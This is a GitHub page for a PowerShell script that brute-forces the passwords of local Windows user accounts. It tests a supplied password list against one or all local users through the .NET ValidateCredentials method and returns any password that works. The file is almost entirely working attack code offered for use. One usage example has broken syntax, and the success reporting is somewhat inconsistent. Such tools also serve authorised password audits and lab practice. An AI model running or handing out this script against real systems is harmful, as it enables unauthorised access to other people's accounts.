-
Notifications
You must be signed in to change notification settings - Fork 92
/
Test-BruteLocalUserCredential.ps1
129 lines (86 loc) · 3.85 KB
/
Test-BruteLocalUserCredential.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
Function Test-BruteLocalUserCredential {
<#
.SYNOPSIS
This cmdlet is used to brute for the password of a local user account on a windows machine
.DESCRIPTION
Use .NET to brute force the password of a local account on a windows machine using the ValidateCredentials method
.PARAMETER Username
This parameter defines the local user account you wish to test passwords against
.PARAMETER Passwd
This parameter defines the passwords you wish to test against the local user account you define
.EXAMPLE
Test-BruteLocalUserCredential -Username Administrator -Passwd 'Password123!','Passw0rd1!'
# This example tests the two defined passwords against the Administrator user account
.EXAMPLE
Test-BruteLocalUserCredential -Username Administrator -Passwd (Get-Content -Path C:\Temp\passlist.txt)
# This example tests the passwords inside the C:\Temp\passlist.txt file against the Administrator user account
.EXAMPLE
$Users = (Get-LocalUser).Name
ForEach $U in $Users) {Test-BruteLocalUserCredential -Username $U -Passwd (Get-Content -Path C:\Temp\passlist.txt)}
# This example tests a password list against all local user accounts
.NOTES
Author: Robert H. Osborne
Alias: tobor
Contact: [email protected]
.LINK
https://osbornepro.com
https://writeups.osbornepro.com
https://encrypit.osbornepro.com
https://btpssecpack.osbornepro.com
https://github.com/tobor88
https://github.com/OsbornePro
https://gitlab.com/tobor88
https://www.powershellgallery.com/profiles/tobor
https://www.linkedin.com/in/roberthosborne/
https://www.credly.com/users/roberthosborne/badges
https://www.hackthebox.eu/profile/52286
.INPUTS
None
.OUTPUTS
None
#>
[CmdletBinding()]
param(
[Parameter(
Mandatory=$True,
ValueFromPipeline=$False,
HelpMessage="`n[H] Enter the username of the local account you wish to brute password tests against. `n[E] EXAMPLE: Administrator")] # End Parameter
[Alias('Name','User','u')]
[ValidateScript({Get-LocalUser -Name $_})]
[String]$Username,
[Parameter(
Mandatory=$True,
ValueFromPipeline=$False,
HelpMessage="`n[H] Define passwords to test against the user specified, separate multiple values with a comma, EXAMPLE: 'Passw0rd1!','Password123!'")] # End Parameter
[String[]]$Passwd
) # End param
$ErrorActionPreference = "SilentlyContinue"
$Final = $Passwd[-1]
Write-Verbose -Message "Adding required .NET method for Account Management"
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Type = [DirectoryServices.AccountManagement.ContextType]::Machine
$Attempt = [DirectoryServices.AccountManagement.PrincipalContext]::New($Type)
ForEach ($P in $Passwd) {
Try {
If (!($Attempt.ValidateCredentials($Username,$P))) {
Write-Verbose -Message "FAILURE: $Username : $P"
} Else {
Write-Output -InputObject "[*] SUCCESS: User has sign in permissions"
$Result = New-Object -TypeName PSCustomObject -Property @{Username=$Username; Password=$P}
} # End Else
If ($P -eq $Final) {
Write-Output -InputObject "[*] None of the specified credentials were successful"
} # End If
} Catch [UnauthorizedAccessException] {
Write-Verbose -Message "FAILURE: $Username : $P"
} Catch {
Write-Output -InputObject "[*] SUCCESS: However this user does not have Sign In permissions"
$Result = New-Object -TypeName PSCustomObject -Property @{Username=$Username; Password=$P}
} Finally {
If ($Result) {
Return $Result
Continue
} # End If
} # End Try Catch Catch Finally
} # End ForEach
} # End Function Test-BruteLocalUserCredential